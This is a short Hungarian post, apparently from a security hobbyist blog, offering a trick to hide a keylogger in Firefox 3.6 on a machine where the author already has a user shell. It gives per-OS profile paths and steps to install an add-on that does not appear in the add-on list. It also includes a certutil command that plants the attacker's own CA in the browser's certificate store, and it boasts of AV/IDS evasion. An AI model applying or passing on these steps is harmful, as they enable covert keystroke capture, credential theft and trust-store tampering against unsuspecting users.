Z küldte az alábbi okosságot, hasznos trükk a rejtőzködésre, köszönjük:

Elképzelt szituáció: egy gépen (linux, windows, osx) van egy user jogú shell-ünk (grafikus felület nem szükséges). 

Cél: firefox (3.6) böngészőbe keyloggert tenni, elrejteni kommunikációt. FF4 alatt nem működik.

Készítsük el az ez_nem_keylogger.xpi -t, securitytube-on vannak példák. Vagy használjunk tetszőleges addon-t.

define

Win
$profile_path: \ C:\Users\x\AppData\Roaming\Mozilla\Firefox\Profiles\hxxxxxzz.default

OSX
$profile_path: \
/Users/x/Library/Application Support/Firefox/Profiles/xyzxyz.default

Ubuntu
$profile_path: /home/x/.mozilla/firefox/xyzxyz.default

XPI-t kicsomagolva másoljuk be a $profile_path/extensions/xyz@zxy.hu könyvtárba, install.rdf-et töröljük. 

Utána a $profile_path/extension.ini -be szúrjuk a következő sort:

ExtensionXY=$profile_path/extensions/xyz@zxy.hu

firefox elindítása/újraindítása után az addon működik, de nincs az addon listában.

SSL feature addon:

Ha SSL-ben szeretnénk kommunikálni a cél szerverrel, és nem szeretnénk tanúsítványra pénzt költeni, akkor töltsük le a megfelelő NSS (Network Security Services) binárist/forrást (vagy nyomjunk fel egy alkalmas RA-t :) ), majd a következő paranccsal tudjuk a saját CA-nkat importálni a tanúsítványtárba (feltéve, hogy a profile könytárban vagyunk, ahol a cert8.db is van):

certutil -A -n Cert1 -i cert.crt -t "TCu,TCu,TCu" -d . 

A hack bonyolultsága felér egy fagolyó bonyolultságával. Cserébe multiplatform, AV/IDS evasion, proxy kompatibilis :)